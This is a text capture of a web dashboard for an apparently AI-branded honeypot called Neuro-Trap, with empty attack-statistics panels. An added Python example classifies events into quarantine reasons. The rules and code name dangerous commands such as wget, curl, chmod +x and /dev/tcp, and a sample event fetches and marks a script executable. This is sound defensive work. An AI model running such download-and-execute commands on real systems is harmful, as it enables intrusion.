NEURO-TRAP

AI-Powered Cyber Immune System — Threat Intelligence Network

📊 THREAT VECTORS (Event Types)

Real-time classification of every intercepted event — connections, login attempts, commands, and system alerts.

🌍 GLOBAL ATTACK ORIGINS
🗺️ TOP ATTACKING COUNTRIES

GeoIP-resolved origins of attackers — showing which nations generate the most hostile traffic against the honeypot.

📈 ATTACK VELOCITY (LAST 24 HOURS)

Hourly attack frequency showing when adversaries are most active — spikes indicate coordinated scanning campaigns.

🎯 TOP ATTACKING IPs
🔑 BREACHED CREDENTIALS
🔐 TOP PASSWORDS
☁️ CREDENTIAL WORDCLOUD (Size = frequency of password attempts)
🏢 TOP ISPs ATTACKING
⚔️ MITRE ATT&CK STAGES
🏗️ INFRA CLASSIFICATION
🧬 CYBER IMMUNE SYSTEM

Just as a biological immune system identifies and neutralizes pathogens, Neuro-Trap classifies, profiles, and quarantines digital threats in real time.

🦠 Pathogens Detected: 0 (Unique Threat Actors)
💉 Antibodies Active: 0 (Counter-Intel Profiles)
🔴 Quarantined: 0 (Auto-Firewall Blocks)
⏱ Avg Session: 0s (Deception Hold Time)
⚠️ THREAT LEVEL DISTRIBUTION

AI classifies each attacker's danger level based on commands executed, dangerous tools used, and login attempts.

🔧 DETECTED HACKING TOOLS

Signature-based detection of offensive tools used by attackers — identified from SSH client banners, HTTP user-agents, command patterns, and threat intelligence reports.

🔍 HOW TOOL DETECTION WORKS
📡 SSH Client Banner — tool name embedded in SSH handshake (e.g. libssh, ZGrab)
🌐 HTTP User-Agent — scanner identifies itself in HTTP headers (e.g. Masscan, Nikto)
⌨️ Shell Commands — commands typed in honeypot shell (wget, nmap, curl, netcat)
🛡️ Threat Feed Events — honeypot's own IDS flags known scanner signatures
🧬 DEVICE FINGERPRINT CLUSTERING — ATTACKER ATTRIBUTION (Same device caught across multiple IPs)

Even when attackers rotate IPs using VPNs, Tor, or botnets, their SSH client binary leaves an identical fingerprint. Neuro-Trap groups these into device clusters — proving attribution across IP rotation.

🧬 Device Clusters: 0 (Multi-IP Devices Detected)
🌐 Linked IPs: 0 (Total IPs in Clusters)
🔴 Largest Cluster: 0 (IPs from One Device)
🔗 MULTI-IP DEVICE CLUSTERS (One device → many IPs = VPN hopping / botnet nodes)
# | Device DNA | SSH Client / Tool | IPs Detected | Total Logins | Commands | Threat | Tools Used
🔴 QUARANTINE RULES — Why Is An IP Blocked?
3+ Failed Logins → Automatically quarantined by auto-firewall (brute-force detected)
Dangerous Commands → wget, curl, chmod +x, /dev/tcp, base64 payload delivery detected
Active Shell Session → 5+ commands executed inside honeypot shell
Monitoring Only → Connected but below threshold — still profiled for intelligence
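
The four rules above as a small classifier, added here as an illustration and not Neuro-Trap's own code. The event field names (`src_ip`, `type`, `input`), the regex, and treating the first three rules as independent quarantine reasons are assumptions; the sample events are constructed.

```python
import re
from collections import defaultdict

# Thresholds as stated in the quarantine rules above.
FAILED_LOGIN_LIMIT = 3
ACTIVE_SHELL_COMMANDS = 5
# Assumed regex rendering of the page's dangerous-command list.
DANGEROUS = re.compile(r"\b(?:wget|curl)\b|chmod\s+\+x|/dev/tcp|\bbase64\b")

def classify(events):
    """Map each source IP to its quarantine reasons; [] means monitoring only."""
    failed = defaultdict(int)
    commands = defaultdict(list)
    ips = dict.fromkeys(e["src_ip"] for e in events)  # keeps first-seen order
    for e in events:
        if e["type"] == "login_failed":
            failed[e["src_ip"]] += 1
        elif e["type"] == "command":
            commands[e["src_ip"]].append(e["input"])
    verdicts = {}
    for ip in ips:
        reasons = []
        if failed[ip] >= FAILED_LOGIN_LIMIT:
            reasons.append("brute_force")
        if any(DANGEROUS.search(c) for c in commands[ip]):
            reasons.append("dangerous_command")
        if len(commands[ip]) >= ACTIVE_SHELL_COMMANDS:
            reasons.append("active_shell")
        verdicts[ip] = reasons
    return verdicts

def ev(ip, kind, text=""):
    """Build one constructed honeypot event (hypothetical schema)."""
    return {"src_ip": ip, "type": kind, "input": text}

# Constructed sample events using documentation-only IP ranges.
SAMPLE_EVENTS = (
    [ev("192.0.2.10", "login_failed")] * 3        # reaches the login threshold
    + [ev("192.0.2.20", "login_failed")] * 2      # one short of it
    + [ev("198.51.100.7", "command", c)
       for c in ("wget http://example.invalid/a.sh", "chmod +x a.sh")]
    + [ev("203.0.113.5", "command", c)
       for c in ("uname -a", "whoami", "id", "ls", "echo curly")]
    + [ev("203.0.113.99", "connect")]             # connected, nothing else
)

if __name__ == "__main__":
    for ip, reasons in classify(SAMPLE_EVENTS).items():
        print(ip, "QUARANTINE" if reasons else "MONITOR", reasons)
```

The word-boundary match keeps `echo curly` from counting as a `curl` invocation, so that session is flagged only for its command count.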
🔬 PATHOGEN PROFILES — LIVE ATTACKER INTELLIGENCE

Each attacker is profiled like a biological pathogen — DNA fingerprinted, behaviorally classified, and ranked by recency. Most recent activity is shown first.

🛡️ WHITE BLOOD CELLS — AUTO-FIREWALL QUARANTINE LOG

IPs are automatically quarantined after 3 or more failed login attempts. This mimics white blood cells neutralizing pathogens that repeatedly try to breach the immune barrier. IPs with fewer than 3 attempts are still profiled and monitored but not yet quarantined.

IP Address | Total Attempts | Quarantine Reason | Status | Action
🔁 LIVE ATTACK REPLAY (FORENSIC EVIDENCE PLAYBACK)

Watch exactly what the hacker typed, command by command, in real time. Every keystroke was captured by Neuro-Trap's deception engine.

📜 TERMINAL INTERCEPT LOGS
Timestamp | Event | IP | Message | Details